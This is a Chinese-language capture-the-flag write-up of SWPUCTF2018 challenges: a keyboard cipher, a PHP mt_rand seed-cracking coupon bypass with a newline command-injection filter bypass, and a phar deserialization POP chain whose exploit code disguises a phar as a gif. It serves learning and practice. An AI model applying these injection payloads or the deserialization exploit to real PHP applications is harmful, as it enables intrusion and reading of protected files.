SWPUCTF2018复现

题目复现

MISC

其它两道都很简单,就不记录了,只记录一下没做出来的

唯有低头,才能出头

做的时候知道是键盘加密,但是对于数字理解错误了,我以为是手机键盘的九键加密…,所以走远了,记录一下这种加密方法,对应于键盘的盲打手势对应字母

1
2
99 9 9 88 11 5 5 66 3 88 3 6 555 9 11 4 33
lookatthekeyboard

WEB

用优惠码 买个 X?

注册并登录之后,页面弹出一个优惠码 uKnfZ2F0aFaZBFy ,但是输入之后却失效,要求我们输入24位的优惠码,题目存在文件泄露 www.zip,下载源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
//生成优惠码
$_SESSION['seed']=rand(0,999999999);
function youhuima(){
mt_srand($_SESSION['seed']);
$str_rand = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$auth='';
$len=15;
for ( $i = 0; $i < $len; $i++ ){
if($i<=($len/2))
$auth.=substr($str_rand,mt_rand(0, strlen($str_rand) - 1), 1);
else
$auth.=substr($str_rand,(mt_rand(0, strlen($str_rand) - 1))*-1, 1);
}
setcookie('Auth', $auth);
}
//support
if (preg_match("/^\d+\.\d+\.\d+\.\d+$/im",$ip)){
if (!preg_match("/\?|flag|}|cat|echo|\*/i",$ip)){
//执行命令
}else {
//flag字段和某些字符被过滤!
}
}else{
// 你的输入不正确!
}
?>

可以看出题目使用了md_srand()函数来产生随机数,而PHP中产生的是伪随机数,即只要我们知道种子的话,那么后续产生的随机数我们也就都可以知道,所以现在就是要爆破随机数种子,可以用php_me_seed工具来爆破,速度快一些,但是我们要先将数据处理为该工具能够识别的输入参数

1
2
3
4
5
6
7
8
9
10
11
12
$pass = "b1o2OrrgqYPMkzK";
$str_rand = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$len = strlen($str_rand) -1;
for ($i=0; $i<strlen($pass); $i++){
if($i<=(15/2)){
$number = strpos($str_rand,$pass[i]);
echo "$number $number 0 $len";
}else{
$number = $len + 1 - strpos($str_rand,$pass[i]);
echo "$number $number 0 $len";
}
}

这样可以得到我们爆破的种子

然后用该种子来生成24位的优惠码(这儿当时想不通哪来的24位,原来就是把代码中长度15改为24就可以了Orz),此时注意php版本不同的话相同的种子也会产生不同的序列,看网站响应头可知该网站php版本为7.2,所以用对应版本生成优惠码即可

然后就是后半段的命令执行绕过了

1
2
3
4
5
6
7
8
9
10
//support
if (preg_match("/^\d+\.\d+\.\d+\.\d+$/im",$ip)){
if (!preg_match("/\?|flag|}|cat|echo|\*/i",$ip)){
//执行命令
}else {
//flag字段和某些字符被过滤!
}
}else{
// 你的输入不正确!
}

对于第一个首尾匹配直接 %0a 换行即可绕过,第二个过滤了通配符,flag字段,可以用单引号绕过,cat命令不能用了就用tail命令即可

1
ip=1.1.1.1%0atail /'fl'ag

方方土学长用的是\绕过,原理是反斜杠会转义特殊字符,而如果字符不是shell特殊字符的话则不转义

1
ip=1.1.1.1%0atail /fl\ag

SimplePHP

查看文件出存在文件读取漏洞,利用该漏洞读取文件源码,

1
http://120.79.158.180:11115/file.php?file=index.php

关键源码如下

function.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php 
//show_source(__FILE__);
include "base.php";
header("Content-type: text/html;charset=utf-8");
error_reporting(0);
function upload_file_do() {
global $_FILES;
$filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg";
//mkdir("upload",0777);
if(file_exists("upload/" . $filename)) {
unlink($filename);
}
move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);
echo '<script type="text/javascript">alert("上传成功!");</script>';
}
function upload_file() {
global $_FILES;
if(upload_file_check()) {
upload_file_do();
}
}
function upload_file_check() {
global $_FILES;
$allowed_types = array("gif","jpeg","jpg","png");
$temp = explode(".",$_FILES["file"]["name"]);
$extension = end($temp);
if(empty($extension)) {
//echo "<h4>请选择上传的文件:" . "<h4/>";
}
else{
if(in_array($extension,$allowed_types)) {
return true;
}
else {
echo '<script type="text/javascript">alert("Invalid file!");</script>';
return false;
}
}
}
?>

file.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php 
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
ini_set('open_basedir','/var/www/html/');
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {
echo "<h2>There is no file to show!<h2/>";
}
$show = new Show();
if(file_exists($file)) {
$show->source = $file;
$show->_show();
} else if (!empty($file)){
die('file doesn\'t exists.');
}
?>

class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<?php
class C1e4r
{
public $test;
public $str;
public function __construct($name)
{
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}
class Show
{
public $source;
public $str;
public function __construct($file)
{
$this->source = $file;
echo $this->source;
}
public function __toString()
{
$content = $this->str['str']->source;
return $content;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}

}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
return $this->get($key);
}
public function get($key)
{
if(isset($this->params[$key])) {
$value = $this->params[$key];
} else {
$value = "index.php";
}
return $this->file_get($value);
}
public function file_get($value)
{
$text = base64_encode(file_get_contents($value));
return $text;
}
}
?>

看到出现了类,思路就基本上是php反序列化了,但是代码中并没有反序列化函数的调用,但是在file.php中看到存在file_exists()函数,该函数是可以通过phar协议实现反序列化的参考文章,接下里的思路就是构造pop链,题目中有提示 <!--flag is in f1ag.php--> ,所以要尝试读取f1ag.php文件

在Show类的show方法中过滤了f1ag字段,那么这个方法应该不行,看了大佬的pop链构造思路,Test类中有file_get_contents()函数可以读取文件内容,所以可以尝试反序列化Test类,file_get()方法被get方法调用,而get方法是被get()魔术方法调用

当读取不可访问属性的值时,__get() 会被调用。也就是,当想要获取一个类的私有属性,或者获取一个类并为定义的属性时。该魔术方法会被调用。

可以看到我们需要访问一个不可访问的变量,在Show中的toString()方法中,运行了 $content = $this->str['str']->source;,该语句会访问不存在的变量source,所以接下来就是要触发toString()方法,正好在C1e4r类中destruct()类中 echo $this->test; 则会触发toString()方法,至此pop链构造完成:

1
2
3
4
1.C1e4r类的__destruct()中的echo $this->test;
2.Show中的__toString()中的$content = $this->str['str']->source;
3.Test中的__get()方法
4.利用file_get_contens()读文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$a = new Test();
$a->params = array("source"=>'/var/www/html/f1ag.php');
$b = new Show('index.php');
$b->str['str'] = $a;
$c= new C1e4r($b);
echo serialize($c);
$obj = unserialize('O:5:"C1e4r":2:{s:4:"test";N;s:3:"str";O:4:"Show":2:{s:6:"source";s:9:"index.php";s:3:"str";a:1:{s:3:"str";O:4:"Test":2:{s:4:"file";N;s:6:"params";a:1:{s:6:"source";s:22:"/var/www/html/f1ag.php";}}}}}');
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('test.php', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($obj);
$phar->stopBuffering();
rename('exploit.phar', 'skyfuck.gif');

然后提交即可

1
phar://upload/680b7502eaac53cac3f3eca74d50f537.jpg
-------------本文结束感谢您的阅读-------------
您今天怎么辣么迷人!